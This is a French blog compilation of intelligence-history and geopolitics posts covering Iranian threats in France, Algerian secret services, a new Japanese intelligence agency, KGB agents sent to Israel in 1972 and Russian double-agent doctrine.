- Méthodes :
- Utilisation d’intermédiaires (grand banditisme, mercenaires) pour éviter une trace directe.
- Surveillance accrue des rassemblements et des figures de l’opposition.
- Risque d’attentats ou d’actions symboliques
- Capacité affaiblie mais imprévisible : La décapitation d’une partie de l’état-major iranien (frappe américano-israélienne de février 2026) a désorganisé les réseaux, mais des actions improvisées (attentats à la voiture piégée, agressions ciblées) restent possibles, surtout si Téhéran cherche à riposter après les frappes subies.
- Cybermenaces : Les services occidentaux alertent sur un risque accru de cyberattaques contre des infrastructures françaises (gouvernement, entreprises, médias), bien que les capacités iraniennes soient actuellement limitées par les coupures internet en Iranbfmtv.com.
- Surveillance et répression des relais iraniens en France
- Réseaux actifs :
- Les services iraniens utilisent des centres culturels, des mosquées chiites et des entreprises écrans pour espionner et recruter.
- La Force Al-Qods (CGRI) et le VAJA collaborent avec des milices ou des criminels pour sous-traiter des opérations violentesrfi.fr.
- Réponse française :
- Renforcement de la protection policière autour des opposants iraniens et des lieux symboliques (ambassades, centres communautaires).
- Surveillance accrue des réseaux iraniens, en coordination avec les alliés européens.
- Scénarios les plus probables
| Type de menace |
Probabilité |
Cibles potentielles |
| Attentats ciblés |
Moyenne |
Opposants, lieux de culte, manifestations |
| Cyberattaques |
Élevée |
Sites gouvernementaux, entreprises |
| Espionnage |
Très élevée |
Dissidents, institutions juives, médias |
| Actions symboliques |
Élevée |
Attaques contre des symboles israéliens ou américains en France |
- Recommandations des autorités
- Vigilance renforcée pour les événements liés à l’Iran (manifestations, conférences).
- Coopération internationale avec l’Allemagne, les Pays-Bas et la Belgique, où des cellules iraniennes ont déjà été démantelées.
- Préparation à des représailles en cas d’escalade supplémentaire au Moyen-Orient.
En résumé : La France est surtout exposée à des actions ciblées (assassinats, espionnage, cyber) plutôt qu’à des attentats massifs. Les opposants iraniens et les infrastructures critiques sont les plus menacés. Les services français restent en alerte maximale, mais la capacité opérationnelle des Iraniens est actuellement réduite par leurs pertes récentes
En 2025–2026, l’Iran n’a pas de rapprochement stratégique ou opérationnel avec l’État islamique (Daech). Au contraire, les deux entités sont en conflit ouvert et s’accusent mutuellement de terrorisme. Voici une synthèse des dynamiques récentes entre l’Iran et les groupes terroristes, ainsi que des clarifications sur les malentendus fréquents :
Iran vs État islamique (Daech) : une opposition frontale
- Attentats de Kerman (janvier 2024) :
- L’Iran a accusé Israël des attentats meurtriers de Kerman (plus de 100 morts), mais ceux-ci ont été revendiqués par l’État islamique (Daech). Téhéran a ensuite minimisé la responsabilité de Daech, préférant pointer Israël pour des raisons politiques.
- Ces attentats ont révélé la vulnérabilité de l’Iran face à Daech, qui cible régulièrement les chiites (considérés comme « hérétiques » par l’EI).
- Conflit idéologique :
- L’Iran chiite et Daech sunnite sont ennemis jurés. L’EI a souvent visé des cibles iraniennes (ex : attentats en 2017 à Téhéran contre le Parlement et le mausolée de Khomeini).
- L’Iran, de son côté, soutient militairement des groupes anti-Daech en Irak et en Syrie (milices chiites, Hezbollah).
- Aucune collaboration :
- Aucune preuve ne montre une coopération entre l’Iran et Daech. Les services iraniens (VAJA, CGRI) combattent activement l’EI en Syrie et en Irak, où ils ont perdu des centaines de combattants.
- Soutien iranien à d’autres groupes terroristes (2025–2026)
L’Iran maintien des liens étroits et documentés avec plusieurs groupes armés, mais exclusivement chiites ou pro-régime :
- Hezbollah (Liban)
- Financement et armement :
- Le CGRI (via la Force Al-Qods) fournit missiles, drones et formations militaires au Hezbollah, utilisé comme proxy contre Israël.
- En 2026, le Hezbollah a lancé des roquettes et drones vers Israël en coordination avec Téhéran, en riposte aux frappes américano-israéliennes
- Houthis (Yémen)
- Soutien logistique :
- L’Iran arme les Houthis avec des missiles balistiques et des drones, utilisés pour attaquer l’Arabie saoudite et les Émirats, ainsi que des navires en mer Rouge.
- En 2026, les Houthis ont revendiqué des frappes sur des bases américaines et israéliennes, avec un soutien iranien avéré.
- Milices chiites en Irak
- Intégration aux forces pro-iraniennes :
- Groupes comme Kataeb Hezbollah ou Asaib Ahl al-Haq sont financés, entraînés et équipés par le CGRI. Ils ciblent les forces américaines en Irak et soutiennent le régime syrien.
- En 2026, ces milices ont attaqué des bases américaines en Irak en représailles aux frappes sur l’Iran
- Hamas (Palestine)
- Soutien historique, mais limité :
- L’Iran fournit des armes et un financement au Hamas (sunnite, mais anti-israélien), bien que leurs relations soient parfois tendues en raison de divergences idéologiques.
- En 2025–2026, le Hamas a reçu des missiles et des drones iraniens, utilisés lors des conflits avec Israël.
- Accusations de liens avec Al-Qaïda : un mythe persistant
- Aucune preuve solide :
- Malgré des rumeurs (notamment sur des échanges de prisonniers ou des contacts ponctuels en Syrie), aucune alliance structurelle n’existe entre l’Iran et Al-Qaïda.
- L’Iran a même arrêté des membres d’Al-Qaïda dans le passé (ex : Saif al-Adel, en 2003), bien que certains aient pu transiter par son territoire.
- Dynamiques récentes (2026) : l’Iran isolé et affaibli
- Perte de dirigeants clés :
- Les frappes américano-israéliennes de février–mars 2026 ont tué plusieurs commandants du CGRI et du VAJA, affaiblissant la capacité de Téhéran à coordonner ses proxys.
- Crise interne :
- Les manifestations de 2025–2026 et la répression sanglante (plus de 7 000 morts selon les ONG) ont déstabilisé le régime, limitant ses ressources pour soutenir ses alliés régionaux.
- Réactions des proxys :
- Le Hezbollah et les Houthis ont riposté symboliquement (tirs de roquettes), mais sans capacité à changer le cours du conflit
- Tableau récapitulatif des liens iraniens avec les groupes terroristes (2026)
| Groupe |
Type de lien |
Activités récentes (2025–2026) |
Preuves |
| Hezbollah |
Alliance stratégique |
Missiles/drones contre Israël, coordination avec le CGRI |
Frappes de mars 202632-98,99 |
| Houthis |
Soutien logistique |
Attaques en mer Rouge et sur l’Arabie saoudite |
Missiles iraniens saisis34-98 |
| Milices irakiennes |
Contrôle direct |
Attaques contre les bases américaines en Irak |
Revendications en 202636-96 |
| Hamas |
Soutien ponctuel |
Fourniture d’armes (missiles, drones) |
Livraisons en 2025–202638-99 |
| État islamique |
Ennemis jurés |
Attentats anti-chiites en Iran |
Revendications en 202440-95 |
| Al-Qaïda |
Aucun lien avéré |
Contacts ponctuels (non confirmés) |
Aucune preuve en 2026 |
par Aics-sr | Mar 25, 2026 | Moments d'histoire, Uncategorized

6 mars 202Les services secrets algériens décodés6
Le général Saïd Chengriha, chef d’état-major de l’armée algérienne, et le président Tebboune.
Le Dictionnaire des services secrets algériens élaboré par le journaliste Adlene Meddi (M&M éditions) se propose de rendre intelligible la « boîte noire » du pouvoir algérien, d’en cartographier les acteurs et d’en saisir les logiques. Un outil précieux pour quiconque s’intéresse à la politique algérienne.

Par Selim Jaziri
Quiconque s’intéresse à la politique algérienne doit se rendre à l’évidence : la réalité du pouvoir n’est pas exercée par les institutions formelles. Les ressorts profonds du pouvoir sont restés « durablement ancrés dans les structures militaires et sécuritaires ». Mais au-delà de cette généralité, cette configuration ne se manifeste que de manière fragmentaire, sous forme de sigles qui peuplent l’imaginaire des Algériens (SM, DRS, GIS, PS…) et de noms d’hommes dépourvus de mandats politiques mais qui exercent la réalité de la puissance par des canaux opaques (Toufik, Khaled Nezzar, Mohamed Lamari, Gaïd Salah, Larbi Belkheir, Mohamed Betchine…).
De la vie de ce pouvoir de l’ombre, on ne perçoit que des éclats : des nominations, des disgrâces qui se devinent après coup, des arrestations et des réhabilitations, l’apparition de nouveaux sigles et la disparition d’autres… En un mot, le pouvoir algérien est une boîte noire qui décourage nombre d’observateurs et probablement d’Algériens eux-mêmes. Le « système » semble une réalité insaisissable et inintelligible.
Le Dictionnaire des services secrets algériens d’Adlène Meddi propose précisément de la rendre intelligible grâce à une cartographie détaillée et un décryptage inédit de ce pouvoir de l’ombre. Il permet d’en retracer la composition et l’histoire et surtout d’en comprendre la logique. La forme du dictionnaire éclate la narration et l’analyse, mais à l’issue d’une lecture somme toute fluide, la description de chacune des pièces du puzzle permet de dégager une vision d’ensemble et en profondeur.
L’autorité de l’État sacralisée
Le pouvoir algérien a été façonné par la lutte de libération nationale (1954-1962). Il en a hérité sa propension au secret et le rôle central de l’armée et des services de renseignement. C’est autour de l’institution militaire que Houari Boumedienne (au pouvoir de 1965 à 1979), chef d’état-major de l’armée des frontières durant la guerre, a structuré le système. Cette histoire a fait de l’État à la fois le produit de la victoire sur le colonisateur et le garant de la préservation de la souveraineté, gagnée au prix du sang des martyrs. L’autorité de l’État est dès lors un patrimoine national à préserver à tout prix. « L’atteinte à l’autorité de l’État », même par des mobilisations pacifiques, «fonctionne comme une catégorie de sécurisation du politique ». La consolidation de l’autorité de l’État est un préalable à toute forme politique.
Toute contestation, décentralisation, expression d’autonomie de la société, toute norme importée de l’étranger, de dissidence discursive est immédiatement interprétée comme une menace pour la souveraineté, voire une trahison. Raison pour laquelle des déclarations sur l’intégrité du territoire (comme ce fut le cas pour Boualem Sansal), la remise en cause de l’unité nationale par le mouvement berbériste, notamment dans sa forme sécessionniste avec la récente proclamation d’indépendance du Mouvement pour l’autodétermination kabyle (le MAK), sont criminalisées.
Surveiller, contrôler, réguler, punir est la respiration naturelle de ce type de pouvoir où le renseignement joue un rôle capital. Cette centralité de l’appareil sécuritaire relativise le rôle des autorités civiles. Le pouvoir est exercé par un ensemble d’acteurs, cercle présidentiel, état-major, services de renseignement, appareils économiques, réseaux régionaux et territoriaux, selon des modalités qui se jouent des hiérarchies, où « les réseaux et les loyautés pèsent autant que les organigrammes ». C’est ce qui explique la plasticité et l’endurance du «système » à l’épreuve des crises. Pour autant, il n’en est pas moins traversé par des rapports de force et des négociations permanentes.
Un monde traversé de luttes
Loin de l’image d’un cabinet noir unifié, où un petit groupe de généraux aux intérêts solidaires déciderait du sort du pays, choisirait et manipulerait les présidents et centraliserait les renseignements, l’univers des services de sécurité est en réalité un monde éclaté, cloisonné et objet de luttes de pouvoir.
Cette « guerre des clans » qui vient périodiquement redistribuer les cartes, a été longtemps contenue dans le huis clos de l’état-major de l’Armée nationale populaire. Mais la présidence, l’armée et les services de renseignement constituent en réalité un ensemble à la fois soudé et concurrentiel au sein duquel les équilibres évoluent. Le choc des émeutes d’octobre 1988, puis les réformes entreprises sous la présidence de Chadli Bendjedid pour limiter et dépolitiser le pouvoir de l’armée, suivies de la « décennie noire » après l’annulation du processus électoral en janvier 1992, ont bouleversé l’appareil sécuritaire et ses relations avec la sphère politique.
La lutte contre le terrorisme a renforcé « la logique sécuritaire comme matrice de gouvernement » et la fameuse DRS (Direction des renseignements et de la sécurité) – créée sous l’impulsion du chef d’état-major Khaled Nezzar en 1990 pour centraliser les services de renseignement et succéder à la non moins fameuse SM (sécurité militaire) – est devenue un pôle de pouvoir largement autonome. Un «Léviathan sécuritaire », incarné par une véritable légende, aussi célèbre qu’entouré de mystère : Mohamed Mediene, alias « Toufik ». Abdelaziz Bouteflika, élu en 1999, a entrepris de démanteler ce pouvoir concurrent pour réaffirmer la centralité de la présidence. Avec l’appui du général Ahmed Gaïd Salah, nommé chef d’état-major en 2004, il s’est attaqué à la DRS jusqu’à sa suppression formelle en 2016.
Des enjeux terre à terre
Derrière l’alibi d’une modernisation des « services », se jouaient en réalité des enjeux plus terre à terre, que décrypte Adlene Meddi, liés à la main mise du clan Bouteflika sur les circuits économiques et à la perspective d’une possible succession à la tête de l’État. C’est sur fond de cette rivalité, apparue au grand jour, entre Gaïd Salah et les réseaux de l’ancienne DRS, que s’est déroulé le hirak. Le long soulèvement populaire de 2019 a permis au chef d’état-major de neutraliser son rival, « Toufik », arrêté en mai 2019, et de se débarrasser du clan Bouteflika.
La disparition de Gaïd Salah en décembre 2019 a permis au successeur de Bouteflika, Abdelmajid Tebboune, sous l’autorité du nouveau chef d’état-major Saïd Chengriha, de mettre un terme « à la polarisation opposant les réseaux dits “gaïdistes” aux anciens cercles du renseignement et de l’état-major ». Le hirak, en revanche, aura fait évoluer les priorités de l’appareil sécuritaire de la lutte contre le terrorisme à la surveillance de la contestation civile.
Les hommes changent, les sigles varient, les priorités évoluent, le « système » se reproduit de crise en crise mais l’État algérien demeure. Le tableau que dessine pièce par pièce Adlene Meddi est bien plus riche et complexe que ce rapide aperçu. Même s’il s’arrête au seuil des questions les plus sensibles et les plus occultes – les relations entre le monde des services et le monde économique, qui justifierait une vaste enquête qui n’est pas le propos de ce livre, et le rôle que l’infiltration des réseaux terroristes, l’un des modes opératoires des services algériens, a pu jouer dans la « décennie noire » (sur lequel on ne peut que spéculer) – ce dictionnaire n’en est pas moins précieux et il a vocation à servir de vade mecum à quiconque veut déchiffrer le pouvoir algérien.
par Aics-sr | Mar 25, 2026 | Moments d'histoire
« Nouvelle Agence Nationale de Renseignement du Japon »
- Contexte et création
- Nom : La nouvelle agence est une évolution du Naichō (内調), ou Cabinet Information Research Office (CIRO), qui était jusqu’ici un bureau de renseignement rattaché directement au Cabinet du Premier ministre.
- Portage politique : La Première ministre japonaise Sanae Takaichi, élue en 2026, a fait de cette réforme une priorité après la large victoire du Parti libéral-démocrate (PLD) aux élections législatives de début 2026. Elle a confié à Kazuya Hara, directeur du service de renseignement central, la mission de créer une agence de renseignement à part entière, indépendante et plus puissante.
- Objectif principal : Renforcer les capacités de collecte et d’analyse du renseignement, tant à l’intérieur qu’à l’extérieur du Japon, pour mieux informer la prise de décision du Premier ministre, notamment face aux menaces régionales (Chine, Corée du Nord, Russie) et aux crises internes.
- Structure et organisation
- Statut : L’agence sera directement placée sous l’autorité du Premier ministre et du Secrétaire général du Cabinet, ce qui lui confère une position centrale dans l’appareil gouvernemental.
- Fusion des services : Elle intégrera et coordonnera les activités de plusieurs entités existantes (ministère des Affaires étrangères, ministère de la Défense, police, etc.), avec pour ambition de centraliser et d’unifier la production du renseignement, à l’image de la CIA américaine ou du MI6 britannique.
- Nouveaux outils :
- Création d’une académie de formation pour agents de renseignement.
- Vote d’une loi sur le contre-espionnage.
- Renforcement des capacités de collecte à l’étranger et amélioration de la coordination inter-agences.
- Budget et moyens : Le Japon a augmenté son budget de défense à 2 % du PIB, ce qui inclut des investissements significatifs dans le renseignement et la technologie (satellites, surveillance, cybersécurité).
- Missions et rôles
- Renseignement extérieur : Surveillance accrue des activités étrangères, notamment en Asie-Pacifique, pour anticiper les crises et protéger les intérêts nationaux (ex. : Taïwan, mer de Chine méridionale).
- Renseignement intérieur : Prévention des menaces internes, lutte contre l’espionnage et le lobbying étranger, avec un système d’enregistrement obligatoire pour les lobbyistes travaillant pour des gouvernements étrangers.
- Soutien à la décision politique : Fournir au Premier ministre une source unique et fiable d’informations, via le Conseil national de sécurité, pour éclairer les choix stratégiques en matière de défense, de diplomatie et de sécurité économique.
- Collaboration internationale : Renforcement des partenariats avec les alliés (États-Unis, Corée du Sud, Europe) pour une meilleure interopérabilité et partage d’informations.
- Enjeux et défis
- Menaces ciblées : La Chine est perçue comme la principale menace stratégique, suivie par la Corée du Nord et la Russie. L’agence devra aussi gérer les risques liés à l’ingérence étrangère et à la cybersécurité.
- Légalité et contrôle démocratique : La réforme s’accompagne de débats sur l’équilibre entre sécurité et libertés individuelles, ainsi que sur la transparence des activités de renseignement.
- Efficacité opérationnelle : Le succès dépendra de la capacité à transformer une structure bureaucratique en une organisation agile et réactive, capable de rivaliser avec les grands services de renseignement mondiaux.
- Calendrier et perspectives
- Mise en œuvre : Les premières mesures (création du bureau renforcé, interdiction des téléphones portables dans les bâtiments gouvernementaux) devraient être adoptées en 2026, avec une montée en puissance progressive.
- Impact géopolitique : Cette réforme s’inscrit dans une stratégie plus large de « normalisation » militaire du Japon, avec une posture plus assertive face aux tensions régionales.
- Comparaisons internationales
- Modèles inspirants : Le Japon étudie les structures de la DGSE (France), du MI6 (Royaume-Uni) et du BND (Allemagne) pour concevoir son agence, tout en adaptant le modèle à son contexte juridique et culturel.
Pourquoi cette réforme est-elle historique ?
- Centralisation du pouvoir : Le Premier ministre dispose désormais d’un outil dédié pour piloter la politique de sécurité nationale, avec une chaîne de commandement claire et des ressources accrues.
- Adaptation à un environnement instable : Face à la montée des tensions en Asie, le Japon cherche à passer d’une posture réactive à une approche proactive, en s’appuyant sur un renseignement de qualité et une meilleure coordination interministérielle.
En résumé : Cette nouvelle agence marque une étape majeure dans l’évolution du Japon vers une puissance de sécurité autonome, capable de protéger ses intérêts et d’influencer les équilibres régionaux. Elle reflète aussi la volonté de Sanae Takaichi de faire du Japon un acteur clé dans la stabilité de l’Indo-Pacifique.
- Structure de la nouvelle agence
- Organisation centrale
- Nom : La nouvelle agence est une évolution du Naichō (内調), ou Cabinet Information Research Office (CIRO), qui était jusqu’ici un bureau de renseignement rattaché au Cabinet du Premier ministre.
- Statut : Elle devient une agence à part entière, indépendante, directement placée sous l’autorité du Premier ministre et du Secrétaire général du Cabinet. Cette réforme vise à centraliser et unifier les services de renseignement japonais, historiquement fragmentés entre plusieurs ministères (Affaires étrangères, Défense, Police, etc.).
- Effectifs : Le Naichō comptait environ 175 agents dans les années 2010, majoritairement détachés d’autres services (police, forces d’autodéfense, etc.). Avec la réforme, l’agence devrait voir ses effectifs et ses moyens considérablement renforcés, avec la création d’une académie de formation pour agents de renseignement et le recrutement de nouveaux experts.
- Fusion des services : L’agence intégrera les activités de plusieurs entités existantes, notamment :
- Le Jōhōhonbu (Defense Intelligence Headquarters, DIH), chargé du renseignement militaire et de la collecte d’informations par satellites et signaux.
- Les services de renseignement de la Police nationale et de l’Agence de sécurité publique, spécialisés dans la lutte contre le terrorisme et l’espionnage intérieur.
- Les cellules de renseignement des ministères des Affaires étrangères et de la Défense, pour une meilleure coordination des informations extérieures et intérieures.
- Divisions clés
- Renseignement intérieur : Surveillance des menaces internes (terrorisme, extrémisme, cybercriminalité, ingérence étrangère).
- Renseignement extérieur : Analyse des menaces régionales (Chine, Corée du Nord, Russie) et collecte d’informations à l’étranger, en collaboration avec les ambassades et les alliés.
- Renseignement géospatial (GEOINT) : Utilisation accrue des satellites et des technologies de surveillance pour suivre les mouvements militaires et les crises (ex. : mer de Chine méridionale, îles Kouriles).
- Contre-espionnage : Lutte contre les activités d’espionnage étranger et protection des secrets d’État, avec un système d’enregistrement obligatoire pour les lobbyistes étrangers.
- Hiérarchie et coordination
- Direction : Un directeur nommé par le Premier ministre, assisté d’un conseil stratégique incluant des représentants des ministères concernés.
- Conseil national de sécurité : Instance de coordination présidée par le Premier ministre, chargée de synthétiser les informations pour éclairer les décisions politiques.
- Missions principales
- Renseignement stratégique
- Collecte et analyse : Centralisation des données issues de sources ouvertes, de signaux, d’images satellites, et de réseaux humains, pour fournir une vision globale des menaces.
- Anticipation des crises : Identification précoce des risques (conflits, cyberattaques, désinformation) et élaboration de scénarios pour le gouvernement.
- Soutien à la décision politique
- Conseil au Premier ministre : Fournir des analyses synthétiques et des recommandations pour orienter la politique de défense, de diplomatie et de sécurité économique.
- Protection des intérêts nationaux : Surveillance des activités étrangères susceptibles de menacer la souveraineté japonaise (ex. : ingérence chinoise, prolifération nucléaire nord-coréenne).
- Coopération internationale
- Partenariats : Renforcement des liens avec les alliés (États-Unis, Corée du Sud, Europe) pour le partage d’informations et les opérations conjointes.
- Lutte contre le terrorisme et la criminalité transnationale : Collaboration avec Interpol, l’ONU et d’autres agences pour traquer les réseaux illicites.
- Formation et innovation
- Académie de renseignement : Formation des agents aux techniques modernes (cybersécurité, analyse de données, opérations clandestines).
- Recherche et développement : Investissement dans les technologies de pointe (IA, drones, cybersurveillance) pour moderniser les capacités de l’agence.
- Enjeux juridiques et contrôle démocratique
- Cadre légal
- Loi sur la protection des secrets d’État : Renforcée en 2013 et révisée en 2026, elle encadre la classification des informations sensibles et les peines pour fuite ou espionnage. Cette loi est critiquée pour son manque de transparence et son potentiel abusif.
- Loi sur le contre-espionnage : Adoptée en 2025-2026, elle élargit les pouvoirs de surveillance de l’agence, mais soulève des questions sur le respect des libertés individuelles et la vie privée.
- Interdiction des téléphones portables dans les bâtiments gouvernementaux sensibles, pour prévenir les fuites.
- Défis éthiques et démocratiques
- Équilibre sécurité/libertés : La centralisation du renseignement et l’extension des pouvoirs de surveillance posent la question du contrôle parlementaire et judiciaire. Les opposants craignent un risque de dérive autoritaire ou de surveillance massive.
- Transparence et responsabilité : L’agence devra rendre des comptes au Parlement, mais les mécanismes de contrôle restent limités, en raison du secret nécessaire à ses opérations.
- Protection des sources : Garantir l’anonymat des informateurs tout en luttant contre les fuites internes, un défi récurrent pour les services japonais.
- Adaptation au droit international
- Respect des conventions : Le Japon doit concilier ses nouvelles prérogatives avec les engagements internationaux en matière de droits de l’homme et de privacy (ex. : Convention européenne des droits de l’homme, accords avec l’UE).
- Collaboration avec les alliés : Harmonisation des procédures avec les partenaires (États-Unis, OTAN) pour faciliter les échanges d’informations, tout en préservant son autonomie décisionnelle.
- Perspectives et défis
- Efficacité opérationnelle : Passer d’une structure bureaucratique à une organisation agile, capable de rivaliser avec la CIA ou le MI6, sans perdre en discrétion.
- Acceptation sociale : Convaincre l’opinion publique, traditionnellement méfiante envers les services secrets, de la nécessité de ces réformes face aux menaces croissantes.
- Risque de politisation : Éviter que l’agence ne devienne un outil au service d’un parti ou d’une idéologie, surtout dans un contexte de tensions régionales.
Synthèse
| Aspect |
Détails clés |
| Structure |
Agence centrale, fusion des services, divisions spécialisées (intérieur/extérieur/GEOINT). |
| Missions |
Renseignement stratégique, soutien à la décision, coopération internationale, innovation. |
| Enjeux juridiques |
Renforcement des lois sur les secrets et le contre-espionnage, contrôle démocratique limité, équilibre sécurité/libertés. |
Le nom exact de la nouvelle agence de renseignement japonaise, issue de la réforme de 2026, n’est pas encore officiellement fixé dans les sources les plus récentes. Cependant, elle est présentée comme une évolution du Naichō (内調), le Cabinet Information Research Office (CIRO), qui devient une agence de renseignement à part entière, directement rattachée au Cabinet du Premier ministre.
Les médias et analystes utilisent souvent les termes suivants pour la désigner :
- « Super-agence de coordination du renseignement » (projet porté par Sanae Takaichi et Kazuya Hara)
- « Direction du renseignement » (selon certaines propositions, calquée sur des modèles comme la CIA ou le MI6)
Pour l’instant, les documents officiels et la presse continuent de parler de la transformation du Naichō en une structure plus puissante et centralisée, mais le nom définitif (s’il a été adopté) n’est pas encore clairement communiqué dans les sources disponibles en mars 2026
par Aics-sr | Mar 25, 2026 | Moments d'histoire
LEOPOLD et ERASMUS : agents du contre-espionnage du KGB envoyés de Lituanie en Israël en 1972
Une découverte dans les archives du KGB lituanien
4 mars 2026
Il est possible qu’au cours de l’été 1973, quelques mois seulement avant la guerre du Kippour, le KGB ait planifié une ou plusieurs opérations clandestines contre l’Occident, impliquant des agents envoyés sous couvert d’émigration juive depuis l’Union soviétique.
Le 18 juillet 1973, le colonel B.A. Shcherbakov , chef du 14e département de la 2e direction générale (contre-espionnage) du KGB, adressa une lettre classifiée secrète aux chefs des directions du contre-espionnage du KGB dans les républiques de l’Union soviétique. L’exemplaire de cette lettre reçu par le colonel Antanas I. Naras, chef de la 2e direction du KGB lituanien à Vilnius, portait le numéro sept.
Le colonel Antanas Naras, chef du contre-espionnage du KGB lituanien (1967-1980), alors jeune Tchékiste. ( source)
Shcherbakov a donné à Naras trente jours (jusqu’au 15 août) pour lui fournir des informations sur tous les agents que le contre-espionnage du KGB lituanien a envoyés en Israël ou dans d’autres « États capitalistes » par le biais de l’émigration juive depuis 1971.
Shcherbakov ne s’intéressait pas seulement aux données biographiques des agents, mais demandait également des informations complètes sur leur profil psychologique, leurs compétences et capacités, leurs méthodes de communication, leur date de départ et les membres de leur famille qui les accompagnaient.
Il voulait également savoir si les agents avaient quitté la Lituanie de leur propre gré, sous quelles couvertures ils avaient opéré et quelles tâches leur avaient été confiées.
Le contre-espionnage du KGB lituanien a répondu à la lettre de Shcherbakov la veille de l’expiration du délai, ce qui laisse supposer qu’il n’était probablement pas très satisfait de ses résultats. De fait, la réponse n’était même pas signée par le colonel Naras, mais par son adjoint, le colonel Valery A. Ginko .

Le colonel Valery Ginko, chef adjoint du contre-espionnage du KGB lituanien (1967-1974), alors jeune Tchékiste. ( source )
Le 14 août, Ginko informa Shcherbakov que les services de contre-espionnage du KGB lituanien avaient dépêché deux agents en Israël durant la période qu’il avait mentionnée. Tous deux furent envoyés en 1972.
Le premier agent, nommé LEOPOLD, a quitté la Lituanie en août 1972. Ginko n’a fourni aucune autre information à son sujet et a renvoyé Shcherbakov à leur correspondance antérieure, en précisant les dates et les numéros de référence. Il lui a rappelé que la Deuxième Direction générale était déjà en possession de trois rapports antérieurs concernant LEOPOLD, datés du 11 avril 1972, du 9 septembre 1972 et du 14 décembre 1972. D’ après Ginko, LEOPOLD exécutait les ordres qui lui avaient été donnés et communiquait par courrier avec ses contacts à Vilnius. Au vu du nombre de rapports émis en si peu de temps, il devait être un agent productif.
Le deuxième agent, nommé ERASMUS, a quitté la Lituanie pour s’installer définitivement en Israël en octobre 1972. Selon Ginko, avant son départ, ERASMUS a accepté de rester en contact avec le contre-espionnage du KGB lituanien, a été formé aux techniques appropriées et a reçu une adresse postale pour sa correspondance clandestine. Ginko a noté que la Deuxième Direction générale a été informée de l’existence d’ERASMUS dans les rapports datés du 10 avril 1972 et du 8 janvier 1973 .
Et pourtant, depuis son arrivée en Israël, Erasmus semblait avoir disparu de la circulation. Il n’avait pas contacté ses supérieurs une seule fois et Ginko reconnaissait à contrecœur que le contre-espionnage du KGB lituanien ignorait la raison de cette absence. Bien évidemment, il ne pouvait admettre qu’Erasmus les avait dupés, qu’il avait berné les agents du KGB.
Cependant, les services de contre-espionnage du KGB lituanien n’étaient pas prêts à abandonner Erasmus. Grâce à la correspondance de sa mère avec ses proches à Vilnius (qu’ils lisaient, ou « perlustraient », pour reprendre un terme du KGB), ils découvrirent qu’Erasmus travaillait dans une entreprise de conception de systèmes de ventilation (Ginko faisait probablement référence à des climatiseurs) et qu’il apprenait l’anglais et l’hébreu.
Le dossier n’indique pas si Shcherbakov a jamais répondu à la lettre de Ginko, ni quoi que ce soit d’autre concernant les activités ultérieures de la Deuxième Direction générale, mais il est clair que la direction du contre-espionnage du KGB ne pouvait guère être satisfaite des performances du contre-espionnage du KGB lituanien dans cette affaire .
1
Cet article est basé sur mes recherches en cours sur les fichiers du KGB lituanien déposés à la bibliothèque et aux archives Hoover. Voir « Начальнику 2 Управления КГБ при СМ Литовской ССР – полковнику тов. Нарасу А. И. [Au chef de la 2e direction du KGB rattachée au Conseil des ministres de la RSS de Lituanie – le colonel camarade AI Naras », 18 juillet 1973, Fond K-1, Op. 3, dossier 700, p. 232. Lietuvos TSR Valstybės Saugumo Komitetas [KGB lituanien], Selected Records, Hoover Institution. Je tiens à remercier la bibliothèque et les archives de la Hoover Institution, ressource essentielle à l’élaboration de ces documents. Les opinions exprimées dans cette publication sont les miennes et ne reflètent pas nécessairement celles des membres, du personnel ou du conseil d’administration de la Hoover Institution.
2
« Начальнику 14 Отдела 2 Главного Управления Комитета Госбезопасности при СМ СССР, полковнику товарищу Щербакову Б. А. [Au chef du 14e Département de la Deuxième Direction générale du Comité pour la sécurité de l’État rattaché au Conseil des ministres de l’URSS, le colonel Camarade BA Shcherbakov] », 14 août 1973, Fond K-1, Op. 3, dossier 700, p. 233. Lietuvos TSR Valstybės Saugumo Komitetas [KGB lituanien] Dossiers sélectionnés, Hoover Institution.
3
Les rapports mentionnés ne figuraient pas dans ce dossier du KGB lituanien.
4
Les rapports mentionnés ne figuraient pas dans ce dossier du KGB lituanien.
5
Ce dossier du KGB lituanien ne contenait aucune information supplémentaire concernant LEOPOLD ou ERASMUS.
par Aics-sr | Fév 10, 2026 | Moments d'histoire
Les services de renseignement du monde entier présentent des similitudes. Tous les services professionnels s’appuient sur des techniques d’espionnage pour recruter et gérer leurs agents. Ils opèrent tous au sein de systèmes bureaucratiques et rendent compte, en fin de compte, aux dirigeants politiques. Fondamentalement, les techniques d’espionnage constituent un langage professionnel commun. Cependant, les services de renseignement russes (RIS) diffèrent sensiblement de leurs homologues occidentaux sur plusieurs points clés. Premièrement, leur mission première n’est ni de servir les intérêts du peuple russe, ni de protéger la Constitution ; leur loyauté va au régime et à la survie politique personnelle de Poutine. Deuxièmement, en matière de techniques d’espionnage, leur approche et leurs tactiques diffèrent de celles de la CIA et des autres services occidentaux. L’un des aspects les plus importants — et souvent mal compris — du renseignement russe est le recours aux agents doubles, connus dans la doctrine du renseignement russe sous le nom de « jeux opérationnels » ( operativnye igry ).
Pour les services de renseignement russes, les jeux opérationnels ne relèvent pas de compétences de niche ni de tactiques de contre-espionnage ponctuelles. Ils sont fondamentaux. Les opérations d’agents doubles sont au cœur de la manière dont les agences russes définissent le succès, justifient leur importance et préservent leur identité institutionnelle. Que les autres méthodes de collecte réussissent ou échouent, le RIS recourt systématiquement et sans relâche aux jeux opérationnels. Par conséquent, comprendre comment et pourquoi le RIS utilise des agents doubles est essentiel pour comprendre le renseignement russe lui-même.
- Loyauté et mission : le régime avant tout
Différence majeure avec l’Occident
- Occident (CIA, MI6, DGSE, etc.) : Les services de renseignement occidentaux sont théoriquement soumis à un cadre démocratique et constitutionnel. Leur mission officielle inclut la protection des intérêts nationaux, la sécurité des citoyens, et le respect des lois. Leur légitimité dépend de leur capacité à servir l’État de droit, même si des dérives existent (ex. : scandales de la NSA ou de la CIA).
- Exemple : La CIA rend des comptes au Congrès américain et est encadrée par des lois comme le Foreign Intelligence Surveillance Act (FISA).
- Russie (FSB, SVR, GRU) : Les RIS sont des instruments de pouvoir personnel avant tout. Leur mission principale est de protéger le régime et, par extension, la survie politique de Vladimir Poutine. La Constitution russe ou l’intérêt du peuple sont secondaires.
- Preuve historique : Le FSB a été utilisé pour réprimer l’opposition (ex. : empoisonnement d’Alexeï Navalny), et le SVR/GRU mènent des opérations hybrides (cyberattaques, désinformation) pour affaiblir les adversaires géopolitiques de la Russie, indépendamment des conséquences pour la population russe.
